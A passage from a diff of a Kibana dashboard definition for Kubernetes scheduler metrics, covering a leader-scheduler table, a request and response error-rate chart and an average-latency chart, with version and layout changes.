"00501c90-b23d-4bca-9354-eb2c48236139": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Server errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - { - "id": "metrics-*", - "name": "f3653393-ef8e-45e9-8b91-5a0472ecf752", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { - "columnOrder": [ - "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "52732cce-1342-46e1-8273-82efeffe9aac", - "469efac9-749a-455e-9864-90dc0f5f954e", - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" - ], - "columns": { - "37b94d21-2d12-4136-a81d-908d8fc7f78a": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "orchestrator.cluster.name" - }, - "469efac9-749a-455e-9864-90dc0f5f954e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "52732cce-1342-46e1-8273-82efeffe9aac": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Leader scheduler name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": 
true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e": { - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.leader.is_master: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.scheduler.leader.is_master", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.leader.is_master" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "00501c90-b23d-4bca-9354-eb2c48236139X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "00501c90-b23d-4bca-9354-eb2c48236139X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" + }, + "00501c90-b23d-4bca-9354-eb2c48236139X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.schedule.code >= 500" + }, + "isBucketed": false, + "label": "Part of Server errors", + "operationType": "counter_rate", + "references": [ + "00501c90-b23d-4bca-9354-eb2c48236139X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Client errors", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - 
"filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f3653393-ef8e-45e9-8b91-5a0472ecf752", - "key": "kubernetes.scheduler.leader.is_master", - "negate": false, - "params": { - "query": true - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "kubernetes.scheduler.leader.is_master": true - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" + }, + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.code >= 400 and kubernetes.scheduler.code < 500" + }, + "isBucketed": false, + "label": "Part of Client errors", + "operationType": "counter_rate", + "references": [ + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1 + } }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "469efac9-749a-455e-9864-90dc0f5f954e", - "isTransposed": false, - "width": 256.6666666666667 - }, - { - "columnId": 
"e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "52732cce-1342-46e1-8273-82efeffe9aac", - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "37b94d21-2d12-4136-a81d-908d8fc7f78a", - "isTransposed": false, - "width": 345.66666666666663 - } - ], - "headerRowHeight": "auto", - "layerId": "1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "layerType": "data", - "rowHeight": "auto" - } + "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "668a51aa-98da-465e-9b09-d49e4f219968", - "w": 24, - "x": 0, - "y": 81 - }, - "panelIndex": "668a51aa-98da-465e-9b09-d49e4f219968", - "title": "Leader scheduler", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.count" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests and responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. 
Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.scheduler.method", + "kubernetes.scheduler.code" + ], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.host" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 5, - "i": "e70eea20-8653-4340-b6dd-620090d3cf7a", - "w": 24, - "x": 24, - "y": 81 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061", + "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", + "00501c90-b23d-4bca-9354-eb2c48236139" + ], + "layerId": 
"7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "e70eea20-8653-4340-b6dd-620090d3cf7a", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0", - "00501c90-b23d-4bca-9354-eb2c48236139", - "00501c90-b23d-4bca-9354-eb2c48236139X1", - "00501c90-b23d-4bca-9354-eb2c48236139X0" - ], - "columns": { - "00501c90-b23d-4bca-9354-eb2c48236139": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Server errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ 
- "00501c90-b23d-4bca-9354-eb2c48236139X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "00501c90-b23d-4bca-9354-eb2c48236139X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - "00501c90-b23d-4bca-9354-eb2c48236139X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.schedule.code \u003e= 500" - }, - "isBucketed": false, - "label": "Part of Server errors", - "operationType": "counter_rate", - "references": [ - "00501c90-b23d-4bca-9354-eb2c48236139X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - 
"148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.code \u003e= 400 and kubernetes.scheduler.code \u003c 500" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - }, - "formula": "counter_rate(last_value(kubernetes.scheduler.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top values", - "operationType": "terms", - "params": { - "missingBucket": false, - 
"orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.scheduler.method", - "kubernetes.scheduler.code" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.host" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests and responses counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 87 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - 
{ - "accessors": [ - "63268365-bb35-456f-831c-78238984a061", - "148bf5e1-71ed-4e36-af5d-ebc5a76b0da4", - "00501c90-b23d-4bca-9354-eb2c48236139" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "secondaryFields": [ + "kubernetes.scheduler.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.host" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 86 - }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests and responses counter rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": 
true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.scheduler.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency in ms", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "ms" - } - }, - "formula": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency in ms", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.client.request.duration.us.count" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average 
latency in ms", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 134, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency in ms", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - 
"legendSize": "large", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "formula": "last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 134, + "min": 0 + }, + "name": "divide", + "text": 
"last_value(kubernetes.scheduler.client.request.duration.us.sum)/last_value(kubernetes.scheduler.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 87 + "layers": [ + { + "accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "large", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Scheduler", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - 
"created_at": "2023-04-24T13:36:10.877Z", - "id": "kubernetes-f5ab5510-9c94-11e9-94fd-c91206cd5249", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a2b844d8-11e3-4469-af4b-744d33b603ad:indexpattern-datasource-layer-0c578d26-c937-4b73-a3a6-e15ebd5854e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "125ec894-444e-486b-a9c8-7205cde12a7e:indexpattern-datasource-layer-8cad09ad-7860-45ac-aaad-7b94af09c33d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e6506b77-2e3b-4bfa-831a-8a5daada553b:indexpattern-datasource-layer-af585c84-2ebf-42a3-9073-4d76e8b2610d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:indexpattern-datasource-layer-c0fe3677-6a5b-4340-8ad0-d8e31b042fe8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "181a3fe5-e5b5-472e-98af-ea4aaadc3109:c038d00b-5e03-420e-9c45-a8aea3c41f99", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d35d8849-89ba-42b8-8120-c14b087f9690:indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:6572ee4d-01b4-47db-8804-d8ef217e21da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
